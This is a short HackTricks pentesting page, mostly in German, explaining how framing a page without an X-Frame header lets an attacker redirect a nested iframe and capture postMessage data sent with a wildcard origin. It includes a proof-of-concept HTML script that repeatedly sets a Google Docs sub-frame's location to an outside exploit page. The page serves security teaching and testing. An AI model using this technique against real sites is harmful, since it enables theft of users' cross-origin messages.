hacktricks/pentesting-web/postmessage-vulnerabilities/steal-postmessage-modifying-iframe-location.md

3.4 KiB

Steal postmessage modifying iframe location

{% hint style="success" %} Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Support HackTricks
{% endhint %}

Ändern der Standorte von Kind-IFRAMES

Laut diesem Bericht kann man, wenn man eine Webseite ohne X-Frame-Header, die ein anderes iframe enthält, in ein iframe einfügt, den Standort dieses Kind-IFRAMES ändern.

Zum Beispiel, wenn abc.com efg.com als iframe hat und abc.com keinen X-Frame-Header hat, könnte ich efg.com zu evil.com über die Ursprungsgrenze mit frames.location ändern.

Dies ist besonders nützlich bei postMessages, da es möglich ist, den Standort des zugehörigen iframes (Kind oder Eltern) auf einen vom Angreifer kontrollierten Standort zu ändern und diese Daten zu stehlen, wenn eine Seite sensible Daten mit einem Wildcard wie windowRef.postmessage("","*") sendet.

<html>
<iframe src="https://docs.google.com/document/ID" />
<script>
//pseudo code
setTimeout(function(){ exp(); }, 6000);

function exp(){
//needs to modify this every 0.1s as it's not clear when the iframe of the iframe affected is created
setInterval(function(){
window.frames[0].frame[0][2].location="https://geekycat.in/exploit.html";
}, 100);
}
</script>
</html>

{% hint style="success" %} Lerne & übe AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Lerne & übe GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Unterstütze HackTricks
{% endhint %}